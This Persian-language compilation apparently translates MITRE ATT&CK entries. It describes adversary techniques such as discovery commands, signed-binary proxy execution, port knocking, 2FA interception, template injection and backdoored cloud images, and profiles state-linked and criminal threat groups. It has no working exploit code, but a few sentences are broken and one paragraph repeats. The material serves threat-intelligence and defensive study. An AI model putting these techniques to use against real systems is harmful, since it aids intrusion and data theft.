دشمنان ممکن است سعی کنند کاربر اصلی را که در حال حاضر وارد سیستم شده است، مجموعه ای از کاربرانی که معمولاً از یک سیستم استفاده می کنند، یا اینکه آیا کاربر به طور فعال از سیستم استفاده می کند، شناسایی کنند. آنها ممکن است این کار را انجام دهند، برای مثال، با بازیابی نام کاربری حساب یا با استفاده از OS Credential Dumping . اطلاعات ممکن است به روش‌های مختلف با استفاده از سایر تکنیک‌های Discovery جمع‌آوری شود، زیرا جزئیات کاربر و نام کاربری در سراسر سیستم رایج است و شامل مالکیت فرآیند در حال اجرا، مالکیت فایل/دایرکتوری، اطلاعات جلسه و گزارش‌های سیستم می‌شود. دشمنان ممکن است از اطلاعات مالک سیستم/کشف کاربر در حین کشف خودکار برای شکل دادن به رفتارهای بعدی استفاده کنند، از جمله اینکه آیا دشمن به طور کامل هدف را آلوده می کند و/یا اقدامات خاصی را انجام می دهد. ابزارها و دستورات مختلف ممکن است این اطلاعات را به دست آورند، از جمله whoami در macOS و Linux، کاربر وارد شده در حال حاضر با w و who قابل شناسایی است.

ممکن است دشمنان سعی کنند اطلاعاتی در مورد خدمات ثبت شده به دست آورند. دستوراتی که ممکن است اطلاعاتی در مورد خدمات با استفاده از ابزارهای سیستم عامل به دست آورند عبارتند از "sc," "tasklist /svc" با استفاده از Tasklist، و ""net start با استفاده از Net، اما دشمنان ممکن است از ابزارهای دیگری نیز استفاده کنند. دشمنان ممکن است از اطلاعات System Service Discovery در حین کشف خودکار برای شکل دادن به رفتارهای بعدی استفاده کنند، از جمله اینکه آیا دشمن به طور کامل هدف را آلوده کرده و/یا اقدامات خاصی را انجام می دهد یا خیر.

یک حریف ممکن است زمان و/یا منطقه زمانی سیستم را از یک سیستم محلی یا راه دور جمع آوری کند. زمان سیستم توسط سرویس زمان ویندوز در یک دامنه تنظیم و ذخیره می شود تا همگام سازی زمانی بین سیستم ها و خدمات در یک شبکه سازمانی حفظ شود. اطلاعات زمان سیستم ممکن است به روش‌های مختلفی جمع‌آوری شود، مانند Net در ویندوز با انجام net time \hostname برای جمع‌آوری زمان سیستم در یک سیستم راه دور. منطقه زمانی قربانی نیز ممکن است از زمان فعلی سیستم استنتاج شود یا با استفاده از w32tm /tz جمع آوری شود. این اطلاعات می‌تواند برای اجرای تکنیک‌های دیگر، مانند اجرای یک فایل با یک کار/کار زمان‌بندی شده، یا برای کشف اطلاعات محل بر اساس منطقه زمانی برای کمک به هدف‌گیری قربانی (یعنی کشف موقعیت مکانی سیستم) مفید باشد. دشمنان همچنین ممکن است از دانش زمان سیستم به عنوان بخشی از بمب ساعتی استفاده کنند یا اجرا را تا تاریخ/ زمان مشخصی به تأخیر بیندازند.

دشمنان ممکن است سعی کنند از صفحه دسکتاپ عکس بگیرند تا اطلاعات را در طول یک عملیات جمع آوری کنند. عملکرد تصویربرداری از صفحه ممکن است به عنوان یکی از ویژگی های ابزار دسترسی از راه دور مورد استفاده در عملیات پس از سازش گنجانده شود. گرفتن اسکرین شات نیز معمولاً از طریق برنامه های کاربردی بومی یا تماس های API، مانند CopyFromScreen، xwd، یا screencapture امکان پذیر است.

دشمنان ممکن است استخراج داده ها را برنامه ریزی کنند تا فقط در ساعات معینی از روز یا در فواصل زمانی معین انجام شود. این می تواند برای ترکیب الگوهای ترافیک با فعالیت یا در دسترس بودن عادی انجام شود. هنگامی که از اکسفیلتراسیون برنامه ریزی شده استفاده می شود، سایر تکنیک های اکسفیلتراسیون احتمالاً برای انتقال اطلاعات به خارج از شبکه نیز کاربرد دارند. مانند or .

دشمنان ممکن است با استفاده از پروکسی اجرای محتوای مخرب با باینری های امضا شده، از فرآیند و/یا دفاع مبتنی بر امضا دور بزنند. باینری‌های امضا شده با گواهی‌های دیجیتال قابل اعتماد می‌توانند در سیستم‌های ویندوزی که با تأیید امضای دیجیتال محافظت می‌شوند اجرا شوند. چندین باینری امضا شده مایکروسافت که به طور پیش فرض در نصب ویندوز هستند، می توانند برای اجرای پروکسی فایل های دیگر استفاده شوند.

دشمنان ممکن است از اسکریپت های امضا شده با گواهی های مطمئن برای اجرای پروکسی فایل های مخرب استفاده کنند. چندین اسکریپت امضا شده مایکروسافت که به طور پیش فرض در نصب ویندوز هستند را می توان برای اجرای پروکسی فایل های دیگر استفاده کرد. این رفتار ممکن است توسط دشمنان برای اجرای فایل‌های مخربی که می‌توانند کنترل برنامه و اعتبارسنجی امضا در سیستم‌ها را دور بزنند مورد سوء استفاده قرار گیرد.

دشمنان ممکن است کنترل‌های امنیتی را تضعیف کنند که یا به کاربران در مورد فعالیت غیرقابل اعتماد هشدار می‌دهند یا از اجرای برنامه‌های نامعتبر جلوگیری می‌کنند. سیستم‌های عامل و محصولات امنیتی ممکن است دارای مکانیسم‌هایی برای شناسایی برنامه‌ها یا وب‌سایت‌هایی باشند که دارای سطحی از اعتماد هستند. نمونه‌هایی از چنین ویژگی‌هایی عبارتند از: اجازه اجرای برنامه به دلیل امضای یک گواهی امضای کد معتبر، برنامه‌ای که کاربر را با اخطار می‌خواهد زیرا مجموعه‌ای از ویژگی‌ها از دانلود از اینترنت دارد، یا دریافت نشانه‌ای مبنی بر اینکه شما در شرف اتصال به یک سایت غیرقابل اعتماد هستند. ممکن است دشمنان تلاش کنند تا این مکانیسم های اعتماد را زیر و رو کنند. روشی که دشمنان استفاده می کنند به مکانیسم خاصی بستگی دارد که آنها به دنبال براندازی هستند. دشمنان ممکن است برای حمایت از براندازی این کنترل‌ها، مجوزهای فایل و فهرست را اصلاح یا رجیستری را اصلاح کنند. دشمنان همچنین ممکن است گواهی های امضای کد را ایجاد کنند یا آنها را بدزدند تا اعتماد سیستم های هدف را به دست آورند.

دشمنان ممکن است خدمات را در یک سیستم متوقف یا غیرفعال کنند تا آن خدمات را برای کاربران قانونی از دسترس خارج کنند. توقف خدمات یا فرآیندهای حیاتی می‌تواند پاسخ به یک حادثه را مهار یا متوقف کند یا به اهداف کلی دشمن برای ایجاد آسیب به محیط‌زیست کمک کند.دشمنان ممکن است این کار را با غیرفعال کردن خدمات فردی با اهمیت بالا برای یک سازمان انجام دهند، مانند MSExchangeIS، که محتوای Exchange را غیرقابل دسترس می کند.در برخی موارد، دشمنان ممکن است بسیاری یا همه سرویس‌ها را متوقف یا غیرفعال کنند تا سیستم‌ها را غیرقابل استفاده کنند. سرویس‌ها یا فرآیندها ممکن است اجازه تغییر ذخیره‌های داده‌های خود را در حین اجرا ندهند. دشمنان ممکن است خدمات یا فرآیندها را به منظور انجام تخریب داده یا داده‌های رمزگذاری شده برای تأثیر بر روی ذخیره‌سازی داده‌های سرویس‌هایی مانند Exchange و SQL Server متوقف کنند.

دشمنان ممکن است سیستم‌ها را خاموش/ راه‌اندازی مجدد کنند تا دسترسی به آن سیستم‌ها را قطع کنند یا به تخریب آن‌ها کمک کنند. سیستم‌های عامل ممکن است حاوی دستوراتی برای شروع خاموش کردن/راه‌اندازی مجدد دستگاه باشند. در برخی موارد، این دستورات ممکن است برای شروع خاموش کردن/راه‌اندازی مجدد یک کامپیوتر راه دور نیز استفاده شوند. خاموش کردن یا راه‌اندازی مجدد سیستم‌ها ممکن است دسترسی به منابع رایانه را برای کاربران قانونی مختل کند. دشمنان ممکن است پس از تحت تأثیر قرار دادن سیستم به روش‌های دیگری مانند Disk Structure Wipe یا Inhibit System Recovery، سعی کنند سیستم را خاموش/راه‌اندازی مجدد کنند تا تأثیرات مورد نظر بر در دسترس بودن سیستم را تسریع بخشند.

تیم کرم شنی یک گروه تهدید مخرب است که به واحد نظامی 74455 اداره اطلاعات اصلی ستاد کل روسیه مرکز اصلی فناوری‌های ویژه نسبت داده شده است. این گروه حداقل از سال 2009 فعال بوده است. در اکتبر 2020، ایالات متحده شش افسر GRU واحد 74455 مرتبط با تیم کرم شنی را به دلیل عملیات سایبری زیر متهم کرد: حملات 2015 و 2016 علیه شرکت های برق اوکراین و سازمان های دولتی، حمله جهانی NotPetya در سال 2017، هدف قرار دادن کمپین ریاست جمهوری فرانسه در سال 2017، حمله ناوشکن المپیک 2018 علیه بازی‌های المپیک زمستانی، عملیات 2018 علیه سازمان منع سلاح‌های شیمیایی و حملات علیه کشور گرجستان در سال‌های 2018 و 2019. برخی از اینها با کمک واحد 26165 GRU انجام شد که به آن نیز می‌گویند.

Scarlet Mimic یک گروه تهدید است که فعالان حقوق اقلیت ها را هدف قرار داده است. این گروه مستقیماً با یک منبع دولتی مرتبط نبوده است، اما به نظر می رسد انگیزه های این گروه با انگیزه های دولت چین همپوشانی دارد. در حالی که بین آدرس های IP استفاده شده توسط Scarlet Mimic و Putter Panda مقداری همپوشانی وجود دارد، نتیجه گیری نشده است که گروه ها یکسان هستند.

Operation Sharpshooter نام یک کمپین جاسوسی سایبری است که در اکتبر 2018 کشف شد و شرکت‌های هسته‌ای، دفاعی، انرژی و مالی را هدف قرار داد. اگرچه همپوشانی هایی بین این دشمن و گروه لازاروس مشاهده شده است، پیوندهای قطعی ایجاد نشده است.

Sidewinder یک گروه مظنون تهدیدکننده هندی است که حداقل از سال 2012 فعال بوده است. مشاهده شده است که آنها دولت، ارتش و نهادهای تجاری را در سراسر آسیا هدف قرار می دهند که عمدتاً بر پاکستان، چین، نپال و افغانستان تمرکز دارند.

Silence یک عامل تهدید با انگیزه مالی است که موسسات مالی را در کشورهای مختلف هدف قرار می دهد. این گروه اولین بار در ژوئن2016 دیده شد. اهداف اصلی آنها در روسیه، اوکراین، بلاروس، آذربایجان، لهستان و قزاقستان قرار دارند. آنها سیستم های بانکی مختلفی از جمله مشتری ایستگاه کاری خودکار بانک مرکزی روسیه، دستگاه های خودپرداز و پردازش کارت را به خطر انداختند.

Silent Librarian گروهی است که حداقل از سال 2013 تحقیقات و داده‌های اختصاصی را در دانشگاه‌ها، سازمان‌های دولتی و شرکت‌های بخش خصوصی در سرتاسر جهان هدف قرار داده است. اعضای کتابدار خاموش به عنوان وابسته به مؤسسه مبنا مستقر در ایران هستند که نفوذهای سایبری را به دستور دولت ایران، به ویژه سپاه پاسداران انقلاب اسلامی انجام داده است.

SilverTerrier یک گروه تهدید نیجریه است که از سال 2014 فعال بوده است. SilverTerrier عمدتاً سازمان‌هایی را در زمینه فناوری پیشرفته، آموزش عالی، و تولید هدف قرار می‌دهد.

Sowbug یک گروه تهدید است که حداقل از سال 2015 حملات هدفمندی را علیه سازمان ها در آمریکای جنوبی و آسیای جنوب شرقی، به ویژه نهادهای دولتی انجام داده است.

Stealth Falcon یک گروه تهدید است که حداقل از سال 2012 حملات جاسوسی را علیه خبرنگاران، فعالان و مخالفان اماراتی انجام داده است. تایید شده است.

Strider یک گروه تهدید است که حداقل از سال 2011 فعال بوده و قربانیان را در روسیه، چین، سوئد، بلژیک، ایران و رواندا هدف قرار داده است.

Suckfly یک گروه تهدید مستقر در چین است که حداقل از سال 2014 فعال بوده است.

دشمنان ممکن است از سیگنال های ترافیکی برای پنهان کردن پورت های باز یا سایر عملکردهای مخرب استفاده شده برای تداوم یا فرمان و کنترل استفاده کنند. سیگنالینگ ترافیک شامل استفاده از یک مقدار یا دنباله جادویی است که باید به سیستم ارسال شود تا یک پاسخ خاص مانند باز کردن یک پورت بسته یا اجرای یک کار مخرب را ایجاد کند. این ممکن است به شکل ارسال یک سری بسته با ویژگی های خاص قبل از باز شدن یک پورت باشد که دشمن می تواند از آنها برای فرمان و کنترل استفاده کند. معمولاً این سری از بسته ها شامل تلاش برای اتصال به یک دنباله از پیش تعریف شده از پورت های بسته به عنوان مثال ( Port Knocking) است، اما می تواند شامل پرچم های غیر معمول، رشته های خاص یا سایر ویژگی های منحصر به فرد باشد. پس از تکمیل توالی، باز کردن یک پورت ممکن است توسط فایروال مبتنی بر میزبان انجام شود، اما می تواند توسط نرم افزار سفارشی نیز پیاده سازی شود. دشمنان همچنین ممکن است با یک پورت از قبل باز شده ارتباط برقرار کنند، اما سرویسی که در آن پورت گوش می‌دهد تنها در صورتی به دستورات پاسخ می‌دهد یا سایر عملکردهای مخرب را در صورت ارسال مقادیر جادویی مناسب فعال می‌کند.

تاکتیک ها چیزهایی هستند که مهاجمان سعی در دستیابی به آن دارند، در حالی که تکنیک های فردی نحوه انجام آن مراحل یا اهداف است. مثلا یکی از تاکتیک ها Lateral Movement است.

دشمنان ممکن است مکانیسم های احراز هویت دو عاملی مانند کارت های هوشمند را هدف قرار دهند تا به اعتبارنامه هایی دسترسی پیدا کنند که می توانند برای دسترسی به سیستم ها، خدمات و منابع شبکه مورد استفاده قرار گیرند. استفاده از احراز هویت دو یا چند عاملی )2(FA یا (MFA) توصیه می‌شود و سطح امنیت بالاتری نسبت به نام‌های کاربری و رمز عبور به تنهایی فراهم می‌کند، اما سازمان‌ها باید از تکنیک‌هایی آگاه باشند که می‌توانند برای رهگیری و دور زدن این مکانیسم‌های امنیتی استفاده شوند. اگر از یک کارت هوشمند برای احراز هویت دو مرحله‌ای استفاده می‌شود، باید از یک کی لاگر برای دریافت رمز عبور مرتبط با کارت هوشمند در طول استفاده عادی استفاده شود. هم با کارت درج شده و هم با دسترسی به رمز کارت هوشمند، دشمن می تواند با استفاده از سیستم آلوده به یک منبع شبکه متصل شود تا احراز هویت را با توکن سخت افزاری درج شده پروکسی کند. دشمنان همچنین ممکن است از یک کی لاگر برای هدف قرار دادن سایر توکن های سخت افزاری مانند RSA SecurID استفاده کنند. گرفتن ورودی نشانه (شامل کد شناسایی شخصی کاربر) ممکن است دسترسی موقت (یعنی پخش مجدد رمز عبور یک بار مصرف تا زمان تغییر ارزش بعدی) و همچنین به دشمنان را قادر سازد تا به طور قابل اعتماد مقادیر احراز هویت آینده را پیش بینی کنند (با توجه به دسترسی به الگوریتم و هر مقادیر بذر مورد استفاده برای تولید کدهای موقت الحاقی). سایر روش‌های 2 FAممکن است توسط یک دشمن برای احراز هویت رهگیری و استفاده شود. ارسال کدهای یکبار مصرف از طریق ارتباطات خارج از باند (ایمیل، پیامک) معمول است. اگر دستگاه و/یا سرویس ایمن نباشد، ممکن است در برابر رهگیری آسیب پذیر باشد. اگرچه این مکانیسم‌های احراز هویت عمدتاً توسط مجرمان سایبری متمرکز شده‌اند، اما توسط بازیگران پیشرفته هدف قرار گرفته‌اند.

دشمنان ممکن است با افزودن محتوا به مکان‌های ذخیره‌سازی مشترک، مانند درایوهای شبکه یا مخازن کد داخلی، محموله‌ها را به سیستم‌های راه دور تحویل دهند. محتوای ذخیره شده در درایوهای شبکه یا سایر مکان های مشترک ممکن است با افزودن برنامه های مخرب، اسکریپت ها یا کد سوء استفاده به فایل های معتبر دیگر آلوده شود. هنگامی که کاربر محتوای آلوده به اشتراک گذاشته شده را باز می کند، بخش مخرب را می توان برای اجرای کدهای دشمن در یک سیستم راه دور اجرا کرد. دشمنان ممکن است از محتوای به اشتراک گذاشته شده آلوده برای حرکت جانبی استفاده کنند. محور اشتراک دایرکتوری یک تغییر در این تکنیک است که از چندین تکنیک دیگر برای انتشار بدافزار در هنگام دسترسی کاربران به دایرکتوری شبکه مشترک استفاده می کند. از اصلاح میانبر فایل‌های LNK دایرکتوری استفاده می‌کند که از Masquerading برای شبیه‌سازی دایرکتوری‌های واقعی استفاده می‌کند که از طریق فایل‌ها و فهرست‌های مخفی پنهان می‌شوند. دایرکتوری های مخرب مبتنی بر LNK دارای یک فرمان جاسازی شده هستند که فایل بدافزار پنهان را در فهرست اجرا می کند و سپس دایرکتوری مورد نظر واقعی را باز می کند تا عمل مورد انتظار کاربر همچنان انجام شود. هنگامی که این تکنیک با دایرکتوری های شبکه استفاده می شود، ممکن است منجر به آلودگی مجدد مکرر و دسترسی گسترده به سیستم ها و به طور بالقوه به حساب های جدید و دارای امتیاز بالاتر شود. دشمنان همچنین ممکن است دایرکتوری های شبکه مشترک را از طریق آلودگی های باینری با الحاق یا اضافه کردن کد آن به باینری سالم در فهرست شبکه مشترک به خطر بیاندازند. بدافزار ممکن است نقطه ورودی اصلی(OEP) باینری سالم را تغییر دهد تا مطمئن شود که قبل از کد قانونی اجرا شده است. هنگامی که توسط یک سیستم راه دور اجرا می شود، عفونت می تواند از طریق فایل تازه آلوده شده گسترش یابد. این آلودگی‌ها ممکن است هر دو فرمت باینری و غیر باینری را هدف قرار دهند که به پسوندهایی از جمله، اما نه محدود به، .EXE, .DLL, .SCR, .BAT, and/or .VBSختم می‌شوند.

دشمنان ممکن است با انتقال داده‌ها، از جمله پشتیبان‌گیری از محیط‌های ابری، به حساب ابری دیگری که در همان سرویس کنترل می‌کنند، داده‌ها را استخراج کنند تا از انتقال/دانلود فایل‌های معمولی و تشخیص نفوذ مبتنی بر شبکه جلوگیری کنند. مدافعی که از طریق انتقال فایل های معمولی یا از طریق کانال های فرمان و کنترل بر انتقال های بزرگ به خارج از محیط ابر نظارت می کند، ممکن است مراقب انتقال داده ها به حساب دیگری در همان ارائه دهنده ابر نباشد. چنین انتقال‌هایی ممکن است از APIهای ارائه‌دهنده ابر موجود و فضای آدرس داخلی ارائه‌دهنده ابر برای ترکیب شدن با ترافیک عادی یا جلوگیری از انتقال داده‌ها از طریق رابط‌های شبکه خارجی استفاده کند. حوادثی مشاهده شده است که در آن دشمنان از نمونه های ابری نسخه پشتیبان تهیه کرده و آنها را به حساب های جداگانه منتقل کرده اند.

دشمنان ممکن است برای پنهان کردن کدهای مخرب یا اجبار به احراز هویت، ارجاعاتی را در الگوهای اسناد Office ایجاد یا تغییر دهند. مشخصات Office Open XML (OOXML) مایکروسافت یک قالب مبتنی بر XML را برای اسناد آفیس تعریف می‌کند تا جایگزین فرمت‌های باینری قدیمی‌تر شود. فایل‌های OOXML بایگانی‌های ZIP در معرض فایل‌های XML مختلف قرار می‌گیرند که به عنوان بخش‌ها نامیده می‌شوند و حاوی ویژگی‌هایی هستند که مجموعاً نحوه ارائه یک سند را تعریف می‌کنند. ویژگی‌های درون بخش‌ها ممکن است به منابع عمومی مشترکی که از طریق آدرس‌های اینترنتی آنلاین دسترسی دارند، ارجاع دهند. برای مثال، ویژگی‌های الگو به فایلی ارجاع می‌دهند که به عنوان یک طرح اولیه سند از پیش قالب‌بندی شده عمل می‌کند، که هنگام بارگیری سند واکشی می‌شود. دشمنان ممکن است از این فناوری سوء استفاده کنند تا ابتدا کدهای مخرب را پنهان کنند تا از طریق اسناد اجرا شوند. ارجاعات الگوی تزریق شده به یک سند ممکن است به هنگام بارگیری سند، بارهای مخرب را واکشی و اجرا کنند. این اسناد را می‌توان از طریق تکنیک‌های دیگری مانند فیشینگ و/یا محتوای اشتراک‌گذاری شده مخدوش کرد و ممکن است از تشخیص استاتیک اجتناب کند، زیرا هیچ نشانگر معمولی (ماکرو VBA، اسکریپت و غیره) تا زمانی که بار مخرب واکشی نشده است وجود ندارد. نمونه هایی در طبیعت دیده شده است که در آن از تزریق الگو برای بارگذاری کدهای مخرب حاوی یک سوء استفاده استفاده شده است. این تکنیک همچنین ممکن است با تزریق یک URL SMB/HTTPS یا سایر درخواست‌های اعتبار) و شروع تلاش برای احراز هویت، احراز هویت اجباری را فعال کند.

دشمنان ممکن است از سیگنال های ترافیکی برای پنهان کردن پورت های باز یا سایر عملکردهای مخرب استفاده شده برای تداوم یا فرمان و کنترل استفاده کنند. سیگنالینگ ترافیک شامل استفاده از یک مقدار یا دنباله جادویی است که باید به سیستم ارسال شود تا یک پاسخ خاص مانند باز کردن یک پورت بسته یا اجرای یک کار مخرب را ایجاد کند. این ممکن است به شکل ارسال یک سری بسته با ویژگی های خاص قبل از باز شدن یک پورت باشد که دشمن می تواند از آنها برای فرمان و کنترل استفاده کند. معمولاً این سری از بسته ها شامل تلاش برای اتصال به یک دنباله از پیش تعریف شده از پورت های بسته (به عنوان مثال Port Knocking) است، اما می تواند شامل پرچم های غیر معمول، رشته های خاص یا سایر ویژگی های منحصر به فرد باشد. پس از تکمیل توالی، باز کردن یک پورت ممکن است توسط فایروال مبتنی بر میزبان انجام شود، اما می تواند توسط نرم افزار سفارشی نیز پیاده سازی شود. دشمنان همچنین ممکن است با درگاهی که قبلاً باز شده است ارتباط برقرار کنند، اما سرویسی که در آن پورت گوش می‌دهد تنها در صورتی به دستورات پاسخ می‌دهد یا سایر عملکردهای مخرب را در صورت ارسال مقادیر جادویی مناسب فعال می‌کند. مشاهده بسته های سیگنال برای راه اندازی ارتباط می تواند از طریق روش‌های مختلفی انجام شود. یکی از ابزارها، که در ابتدا توسط Cd00rپیاده‌سازی شد، استفاده از کتابخانه‌های libpcap برای شناسایی بسته‌های مورد نظر است. روش دیگری از سوکت‌های خام استفاده می‌کند که بدافزار را قادر می‌سازد از پورت‌هایی استفاده کند که از قبل برای استفاده توسط برنامه‌های دیگر باز هستند. در دستگاه های شبکه، دشمنان ممکن است از بسته های ساخته شده برای فعال کردن احراز هویت دستگاه شبکه برای خدمات استاندارد ارائه شده توسط دستگاه مانند telnet استفاده کنند. چنین سیگنال دهی همچنین ممکن است برای باز کردن یک پورت سرویس بسته مانند telnet، یا برای فعال کردن اصلاح ماژول ایمپلنت‌های بدافزار در دستگاه، افزودن، حذف یا تغییر قابلیت‌های مخرب استفاده شود. برای فعال کردن این سیگنال‌های ترافیکی در دستگاه‌های تعبیه‌شده، دشمنان باید ابتدا به Patch System Image به دلیل ماهیت یکپارچه معماری دست یابند و از آن استفاده کنند. همچنین ممکن است دشمنان از ویژگی Wake-on-LAN برای روشن کردن سیستم‌های خاموش استفاده کنند. Wake-on-LAN یک ویژگی سخت افزاری است که به سیستم خاموش شده اجازه می دهد تا با ارسال یک بسته جادویی به آن، روشن یا بیدار شود. هنگامی که سیستم روشن می شود، ممکن است به هدفی برای حرکت جانبی تبدیل شود.

ممکن است دشمنان از ابزارهای توسعه‌دهنده مورد اعتماد برای اجرای پراکسی بارهای مخرب استفاده کنند. ابزارهای کمکی زیادی برای کارهای مربوط به توسعه نرم افزار استفاده می شود که می توانند برای اجرای کد به اشکال مختلف برای کمک به توسعه، اشکال زدایی و مهندسی معکوس استفاده شوند. این ابزارهای کمکی ممکن است اغلب با گواهینامه های قانونی امضا شوند که به آنها اجازه می دهد تا بر روی یک سیستم و اجرای پروکسی کد مخرب را از طریق یک فرآیند قابل اعتماد که به طور موثر راه حل های کنترل برنامه را دور می زند، اجرا کنند.

TeamTNT یک گروه تهدید است که عمدتاً محیط های ابری و کانتینری را هدف قرار داده است. این گروه حداقل از اکتبر 2019 فعال بوده و عمدتاً تلاش های خود را بر روی استفاده از منابع ابری و کانتینری برای استقرار استخراج کنندگان ارزهای دیجیتال در محیط های قربانی متمرکز کرده است.

TEMP.Veles یک گروه تهدید مستقر در روسیه است که زیرساخت های حیاتی را هدف قرار داده است. مشاهده شده است که این گروه از TRITON، یک چارچوب بدافزار طراحی شده برای دستکاری سیستم های ایمنی صنعتی استفاده می کند.

شرکت White احتمالاً یک بازیگر تهدید کننده با حمایت دولتی با قابلیت‌های پیشرفته است. از سال 2017 تا 2018، این گروه یک کمپین جاسوسی به نام عملیات شاهین را رهبری کرد که سازمان‌های دولتی و نظامی در پاکستان را هدف قرار داد.

Threat Group-1314یک گروه تهدید غیرمنصوب است که از اعتبارنامه‌های در معرض خطر برای ورود به زیرساخت دسترسی از راه دور قربانی استفاده کرده است.

Threat Group-3390یک گروه تهدید چینی است که به طور گسترده از مصالحه های استراتژیک وب برای هدف قرار دادن قربانیان استفاده کرده است. این گروه حداقل از سال 2010 فعال بوده و سازمان‌هایی را در بخش‌های هوافضا، دولت، دفاع، فناوری، انرژی و تولید هدف قرار داده است.

Thrip یک گروه جاسوسی است که ارتباطات ماهواره ای، مخابرات و شرکت های پیمانکاری دفاعی را در ایالات متحده و آسیای جنوب شرقی هدف قرار داده است. این گروه از بدافزارهای سفارشی و همچنین تکنیک های «زندگی خارج از زمین» استفاده می کند.

تیم تونتو یک گروه تهدید جاسوسی سایبری مشکوک توسط دولت چین است که حداقل از سال 2009 عمدتاً کره جنوبی، ژاپن، تایوان و ایالات متحده را هدف قرار داده است. تا سال 2020، آنها فعالیت های خود را گسترش دادند تا سایر کشورهای آسیایی و همچنین کشورهای اروپای شرقی را در بر گیرند. تیم تونتو سازمان‌های دولتی، نظامی، انرژی، معدن، مالی، آموزشی، بهداشت و درمان و فناوری را هدف قرار داده است، از جمله از طریق کمپین ضربان قلب (2009-2012) و عملیات بیسکویت تلخ (2017).

Transparent Tribe یک گروه تهدید مشکوک مستقر در پاکستان است که حداقل از سال 2013 فعال بوده است و عمدتاً سازمان های دیپلماتیک، دفاعی و تحقیقاتی را در هند و افغانستان هدف قرار می دهد.

Tropic Trooper یک گروه تهدید غیروابسته است که کمپین های هدفمند را علیه اهدافی در تایوان، فیلیپین و هنگ کنگ رهبری کرده است. Tropic Trooper روی هدف قرار دادن دولت، مراقبت های بهداشتی، حمل و نقل و صنایع با فناوری پیشرفته تمرکز دارد و از سال 2011 فعال بوده است.

Turla یک گروه تهدید مستقر در روسیه است که قربانیان را در بیش از 45 کشور آلوده کرده است که طیف وسیعی از صنایع از جمله دولت، سفارتخانه ها، ارتش، آموزش، تحقیقات و شرکت های دارویی را در بر می گیرد. فعالیت های افزایش یافته در اواسط سال 2015 مشاهده شد. تورلا به‌خاطر انجام کمپین‌های حفره‌ای و نیزه‌فیشینگ و استفاده از ابزارهای داخلی و بدافزارها شهرت دارد. پلتفرم جاسوسی Turla عمدتاً علیه ماشین‌های ویندوز استفاده می‌شود، اما دیده شده است که علیه ماشین‌های macOS و Linux نیز استفاده شده است.

حریف ممکن است به اقدامات خاصی توسط کاربر تکیه کند تا بتواند اجرا شود. کاربران ممکن است تحت مهندسی اجتماعی قرار گیرند تا آنها را وادار به اجرای کدهای مخرب، به عنوان مثال، باز کردن یک فایل سند یا پیوند مخرب کنند. این اقدامات کاربر معمولاً به عنوان رفتار متعاقب اشکال فیشینگ مشاهده می شود. در حالی که اجرای کاربر اغلب مدت کوتاهی پس از دسترسی اولیه رخ می دهد، ممکن است در مراحل دیگر نفوذ رخ دهد، مانند زمانی که دشمن یک فایل را در یک فهرست مشترک یا روی دسکتاپ کاربر قرار می دهد به این امید که کاربر روی آن کلیک کند. این فعالیت ممکن است مدت کوتاهی پس از Spearphishing داخلی نیز دیده شود.

حریف ممکن است به کلیک کاربر روی پیوند مخرب برای به دست آوردن اعدام تکیه کند. کاربران ممکن است در معرض مهندسی اجتماعی قرار گیرند تا آنها را وادار به کلیک روی پیوندی کند که منجر به اجرای کد می شود. این اقدام کاربر معمولاً به عنوان رفتار بعدی از Spearphishing Link مشاهده می شود. کلیک کردن روی یک پیوند ممکن است به تکنیک های اجرایی دیگری مانند سوء استفاده از مرورگر یا آسیب پذیری برنامه از طریق Exploitation for Client Execution منجر شود. پیوندها همچنین ممکن است کاربران را به دانلود فایل هایی که نیاز به اجرا دارند از طریق فایل مخرب هدایت کنند.

حریف ممکن است به باز کردن یک فایل مخرب توسط کاربر متکی باشد تا بتواند اجرا شود. کاربران ممکن است تحت مهندسی اجتماعی قرار بگیرند تا آنها را وادار به باز کردن فایلی کند که منجر به اجرای کد می شود. این اقدام کاربر معمولاً به عنوان رفتار بعدی از Spearphishing Attachment مشاهده می شود. دشمنان ممکن است از چندین نوع فایل استفاده کنند که کاربر باید آنها را اجرا کند، از جمله .doc، .pdf، xls.، rtf.، .scr، exe.، lnk.، pif.، و .cpl. دشمنان ممکن است از اشکال مختلف Masquerading روی فایل استفاده کنند تا احتمال باز کردن آن توسط کاربر را افزایش دهند. در حالی که فایل مخرب اغلب مدت کوتاهی پس از دسترسی اولیه رخ می دهد، ممکن است در مراحل دیگر نفوذ رخ دهد، مانند زمانی که دشمن یک فایل را در یک فهرست مشترک یا روی دسکتاپ کاربر قرار می دهد به این امید که کاربر روی آن کلیک کند. این فعالیت ممکن است مدت کوتاهی پس از Spearphishing داخلی نیز دیده شود.

دشمنان ممکن است به کاربری که یک تصویر مخرب را اجرا می کند برای تسهیل اجرا تکیه کنند. خدمات وب آمازون ( AWS) تصاویر ماشین آمازون (AMI) ، تصاویر پلتفرم ابری گوگل (GCP) و تصاویر آژور و همچنین زمان‌های اجرای کانتینرهای محبوب مانند Docker را می‌توان در پشتی قرار داد. تصاویر Backdoor ممکن است از طریق آپلود بدافزار در یک مخزن عمومی آپلود شوند و کاربران می‌توانند نمونه یا محفظه‌ای را بدون اینکه متوجه مخرب بودن تصویر شوند دانلود و مستقر کنند، بنابراین تکنیک‌هایی را که به طور خاص به دسترسی اولیه می‌رسند دور می‌زنند. این می تواند منجر به اجرای کدهای مخرب شود، مانند کدی که استخراج ارز دیجیتال را در نمونه یا کانتینر اجرا می کند.دشمنان همچنین ممکن است تصاویر را به روش خاصی نامگذاری کنند تا احتمال استفاده اشتباه از سوی کاربران یک نمونه یا محفظه از تصویر را افزایش دهند (مثلاً: مطابقت با نام قانونی یا مکان).

دشمنان ممکن است سیستم های در معرض خطر را جستجو کنند تا اعتبارنامه های ذخیره شده ناامن را پیدا کنند و به دست آورند. این اعتبارنامه‌ها را می‌توان در بسیاری از مکان‌های یک سیستم، از جمله فایل‌های متن ساده (مانند تاریخچه ( Bash)، سیستم‌عامل یا مخازن خاص برنامه (مانند اعتبار در رجیستری)، یا سایر فایل‌ها/مصنوعات تخصصی (مانند کلیدهای خصوصی) ذخیره کرد و/یا نامناسب کرد.

